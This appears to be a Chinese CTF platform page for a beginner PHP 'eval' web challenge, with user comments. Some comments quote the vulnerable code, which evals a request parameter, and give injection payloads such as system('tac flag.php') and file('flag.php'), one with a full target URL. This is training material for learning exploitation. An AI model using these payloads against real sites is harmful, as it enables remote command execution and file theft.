evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 16934
提  示:
描  述:
eval
...
登录回复
评论
xiao 4年前
举报

直接用?hello=file('flag.php'),var_dump()函数可以打印

回复 17
wyx48046 4年前
举报

厉害!

回复 0
Hiiro 4年前
举报

大佬大佬

回复 0
test_ctf 4年前
举报

牛逼!

回复 0
Hacker23 4年前
举报

http://114.67.246.176:10183/?hello=system('tac flag.php')

回复 12
ZTyyds 3年前
举报

原理是什么啊???想了解一下

回复 0
guoguo 4年前
举报

题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph

回复 3
dsadscxzewq 4年前
举报

为啥用cat不行呢?

回复 0
痕夕 4年前
举报

看不懂,求解,大佬

回复 6
SwBack 4年前
举报

大道至简,直接当作一句话利用即可 hello=system('tac flag.php')

回复 5
巨人肩膀上的矮子 4年前
举报

@dsadscxzewq cat是可以的,只不过在源代码里查看

回复 0
dsadscxzewq 4年前
举报

为啥用cat不行呢?

回复 1
BBBugku 4年前
举报

F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。

回复 14
krystalll 4年前
举报

感谢

回复 3
lurnco 4年前
举报

Too young Too simple

回复 3
Discuze奇 4年前
举报

我的金币不太允许了呀。。。

回复 1
lurnco 4年前
举报

可以创个小号做后面的题人?

回复 0
1amer 4年前
举报

直接读文件吧

回复 0
你听说过呆呆吗? 4年前
举报

只有我一个人知道bugku更新了吗

回复 0
storn 4年前
举报

我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o

回复 0

WriteUp

image
harry

1 金币

立即查看

评分(9)

解题动态

testda 攻破了该题 1小时前
satuo 攻破了该题 1小时前
goeasy 攻破了该题 5小时前
867736371 攻破了该题 6小时前
废柴小白 攻破了该题 6小时前
19893123836 攻破了该题 6小时前
tcg979 攻破了该题 18小时前
AX渊仪 攻破了该题 23小时前
qwerfsafafa 攻破了该题 23小时前
太水了410410 攻破了该题 23小时前
6145 攻破了该题 1天前
zer0_h 攻破了该题 1天前
Hehe0619 攻破了该题 1天前
李嘉欣a 攻破了该题 1天前
嗨客111 攻破了该题 1天前
呆羊 攻破了该题 1天前
ahco 攻破了该题 1天前
17365797718 攻破了该题 1天前
你猜呀啊哈哈 攻破了该题 1天前
123456rue 攻破了该题 1天前
问题反馈